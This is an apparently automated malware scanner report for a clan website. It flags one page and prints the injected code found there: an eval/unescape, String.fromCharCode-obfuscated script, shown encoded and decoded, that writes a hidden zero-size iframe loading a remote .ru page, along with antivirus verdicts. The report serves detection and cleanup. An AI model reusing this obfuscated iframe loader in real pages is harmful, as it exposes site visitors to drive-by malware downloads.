New scan:

Malware Scanner report for headshot-cs.clan.su

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/5
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://headshot-cs.clan.su/index/0-11
200 OK
Content-Length: 118891
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C115%2C56%2C46%2C115%2C116%2C101%2C97%2C100%2C121%2C104%2C111%2C115%2C116%2C46%2C114%2C117%2C58%2C56%2C49%2C47%2C126%2C101%2C108%2C118%2C105%2C122%2C105%2C47%2C105%2C99%2C101%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));

Decoded script:


document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,56,46,115,116,101,97,100,121,104,111,115,116,46,114,117,58,56,49,47,126,101,108,118,105,122,105,47,105,99,101,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62));
document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,56,46,115,116,101,97,100,121,104,111,115,116,46,114,117,58,56,49,47,126,101,108,118,105,122,105,47,105,99,101,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62));
<iframe src="http://www.s8.steadyhost.ru:81/~elvizi/ice/index.php" width="0" height="0"></iframe>

Antivirus reports:

AntiVir
HEUR/HTML.Malware
Avast
JS:ScriptDC-inf [Trj]
K7AntiVirus
Trojan ( 33ac8bb90 )
TrendMicro-HouseCall
TROJ_GEN.F47V1203
DrWeb
SCRIPT.Virus
NANO-Antivirus
Trojan.Script.IFrame.iicu
F-Prot
JS/IFrame
Norman
Iframe.H
Sophos
Mal/Iframe-F
Commtouch
JS/IFrame
ESET-NOD32
JS/TrojanDownloader.Iframe.NKF

http://s7.ucoz.net/src/jquery-1.7.2.js
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://s7.ucoz.net/src/ulightbox/ulightbox.js
200 OK
Content-Length: 22097
Content-Type: text/javascript
clean
http://s7.ucoz.net/src/uwnd.js?2
200 OK
Content-Length: 228554
Content-Type: text/javascript
clean
http://www.ruscounter.com/count.php?site=7452
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://www.ruscounter.com/test404page.js
404 Not Found
Content-Length: 9626
Content-Type: text/html
clean
http://1directory.ru/cnt.php?id=82
200 OK
Content-Length: 20
Content-Type: text/html
clean
http://1directory.ru/test404page.js
404 Not Found
Content-Length: 9822
Content-Type: text/html
clean
http://1directory.ru/
200 OK
Content-Length: 9822
Content-Type: text/html
clean
http://1directory.ru/register.php
200 OK
Content-Length: 9571
Content-Type: text/html
clean
http://1directory.ru/top.php?view=best
200 OK
Content-Length: 56642
Content-Type: text/html
clean
http://1directory.ru/top.php?view=new
200 OK
Content-Length: 59678
Content-Type: text/html
clean
http://1directory.ru/statistic.php
200 OK
Content-Length: 9206
Content-Type: text/html
clean
http://1directory.ru/contacts.php
200 OK
Content-Length: 3602
Content-Type: text/html
clean
http://1directory.ru/categories.php?cat=Avto_i_moto
200 OK
Content-Length: 32195
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: headshot-cs.clan.su

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: headshot-cs.clan.su
Referer: http://www.google.com/search?q=headshot-cs.clan.su

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=headshot-cs.clan.su

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://headshot-cs.clan.su/

Result: headshot-cs.clan.su is not infected or malware details are not published yet.